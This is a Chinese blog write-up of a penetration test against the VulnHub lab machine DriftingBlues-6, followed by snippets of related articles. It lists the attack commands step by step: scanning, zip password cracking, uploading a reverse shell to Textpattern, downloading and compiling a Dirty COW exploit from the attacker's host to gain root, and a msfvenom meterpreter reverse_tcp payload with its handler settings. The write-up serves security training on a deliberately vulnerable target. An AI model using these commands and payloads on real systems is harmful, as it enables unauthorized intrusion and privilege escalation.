vulnhub靶机:driftingblues-6

最新推荐文章于 2025-05-03 12:54:49 发布
最新推荐文章于 2025-05-03 12:54:49 发布
阅读量853 收藏 18
点赞数 23
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/waitagirl/article/details/136889971
版权
文章描述了一次针对10.9.23.54的黑客渗透测试过程,包括使用ARP扫描、端口扫描、检测内核漏洞、目录探测、暴力破解、文件上传、提权利用脏牛漏洞以及最终生成并上传木马的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.54

内核3.2可能存在脏牛漏洞

三:目录探测

dirb http://10.9.23.54

http://10.9.23.54/robots.txt

10.9.23.54/textpattern/textpattern

add .zip extension to your dir-brute

http://10.9.23.54/textpattern/

dirb http://10.4.7.54 -X .txt,.php,.html,.bak,.md,.zip

gobuster dir -u http://10.9.23.54/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

根据robots.txt下的提示,搜索.zip后缀的目录
/spammer.zip发现这个压缩包,下载解压发现需要密码

wget http://10.9.23.54/spammer.zip

发现有密码,暴力破解一下:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u spammer.zip

得到密码

myspace4

得到用户名和密码

mayer:lionheart

四:渗透测试

http://10.9.23.54/textpattern/

发现有文件上传的地方并且知道了文件上传后的位置,尝试上传个 反弹 shell:

http://10.9.23.54/textpattern/files

反弹成功

五:提权

1.用python回弹交互式shell,find命令也没有可以利用的信息

python -c "import pty;pty.spawn('/bin/bash')"

find / -perm -u=s -type f 2>/dev/null

因为之前发现存在脏牛漏洞

2.uname -a查看靶机内核版本

3.searchsploit kernel 3.2 发现脏牛漏洞

4.python3 -m http.server 80

5:进入tmp目录下,将dirty.c下载下来

wget http://10.9.23.112/dirty.c

6.按照脚本给出的步骤操作

chmod 777 dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

执行

./dirty

后面接密码root

su firefart

靶机结束

2:msfvenom生成木马,文件上传
命令: msfvenom -p php/meterpreter/reverse_tcp LHOST=10.9.23.54 LPORT=4444 -f raw > shell1.php
上传后。

msf模块设置payload:
命令:
set payload php/meterpreter/reverse_tcp
set lhost 10.9.23.112
run

不言君
关注
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 1032
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
vulnhub靶机 | DriftingBlues:6 write-up
xj28555的博客
05-06 901
nmap -sP 192.168.110.1/24 #首先扫描存活网段 扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口,进行访问。 发现只有一张图片,那我们只好开始CTF的套路了,扫描目录。 python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录 扫到robots.txt文件,进行访问一下。 有...
[Vulnhub靶机] DriftingBlues: 5
网安日记本的博客
02-13 2176
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
[Vulnhub靶机] DriftingBlues: 7
网安日记本的博客
02-16 1624
[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法(个人分享)
[Vulnhub靶机] DriftingBlues: 1
网安日记本的博客
02-02 2198
[Vulnhub靶机] DriftingBlues: 1靶机渗透思路及方法(个人分享)
Vulnhub--DriftingBlues-3靶机通关详解
m0_72634167的博客
04-01 2310
1.多层隐藏目录查看,最后源代码种找到了base64编码加密信息2.通过SSH日志信息记录,使用异常的ssh登陆(将用户名改为一句话木马,实现RCE【远程代码执行】),并通过nc反弹shell。3.SSH公钥私钥免密登陆4.SUID搜索发现一个getinfo命令集合了系统命令,使用环境变量进行命令劫持提权。
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 2092
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
Vulnhub--DriftingBlues-2靶机通关详解
m0_72634167的博客
03-28 1128
1.图片隐写的认知2.wpsacn工具的使用3.ssh公私钥的认知4.nmap文件的提权方式。
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1775
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
[Vulnhub靶机] DriftingBlues: 2
网安日记本的博客
02-03 2443
[Vulnhub靶机] DriftingBlues: 2靶机渗透思路及方法(个人分享)
vulnhub靶场之driftingblues-1
qq_58091216的博客
02-24 1003
backup.sh的内容就是用zip命令把/var/www目录下的所有内容打包为/tmp/backup.zip,然后sudo /tmp/emergency,在前面/tmp中找到了这个压缩文件,但是并没有找到emergency文件,需要创建emergency文件,并将eric用户加入sudo组。截止到目前,我们没有扫描到如何有用的信息,我们想想还有什么办法,突然想到源代码我们没有查看,我们进行查看。可能跟ssh登录有关系,果然是ssh登录的密码,不过末尾有数字,其他的都是404。
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3323
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8419
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
vulnhub--DriftingBlues:6复现超详细过程
m0_54024658的博客
06-05 482
下载靶机并且导入VMware masscan扫描存活主机,发现目标靶机192.168.152.225,并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口,查看原代码,没有什么发现,想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP,发现了一个文件robots.txt,访问一下。 访问robots.txt文件发现一个目录,和提示目录
Linux 服务管理两种方式service和systemctl
lza20001103的博客
04-29 2953
Linux 服务管理两种方式service和systemctl
Linux Shell 重定向与管道符号(>, >>, |)的实现机制
imhikaru的专栏
05-01 1691
重定向目标 | 标准输出 → 文件 | 标准输出 → 文件末尾 | 命令输出 → 管道写端,命令输入 ← 管道读端 || 用途 | 输出重定向到文件(覆盖原内容) | 输出追加到文件末尾 | 将前一命令的输出作为后一命令的输入 || 项目 || 系统调用 |
《操作系统精髓与设计原理》第4章课后题答案-线程、对称多处理器和微内核
最新发布
2501_90434822的博客
05-03 300
1.表3.5列出了在一个没有线程的操作系统中进程控制块的基本元素。对于不同的系统来说通常是不同的,但一般来说,进程是资源的所有者,而每个线程有它自己的执行状态。Jacketing通过调用一个应用级的I/O例程来检查I/O设备的状态,从而将一个产生阻塞的系统调用转化为一个不产生阻塞的系统调用。2.请列出线程间的模式切换比进程间的模式切换开销更低的原因。3.进程概念中体现出的两个独立且无关的概念是什么?6.列出用户级线程优于内核级线程的三个优点。7.列出用户级线程相对内核级线程的两个缺点。包含的状态信息更少。
从实列中学习linux shell11 :在 shell 中 对于json的解析 jq 和awk 如何选择,尤其在数据清洗,数据重新组织中的应用
zqy216_2008的博客
05-03 860
在 shell 中 对于json的解析 jq 和awk 如何选择,尤其在数据清洗,数据重新组织中的应用
linux的信号量初识
m0_54069809的博客
05-02 1088
本文主要讲linux下信号量的使用与注意事项
vulnhub靶机 driftingblues2
01-04
### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值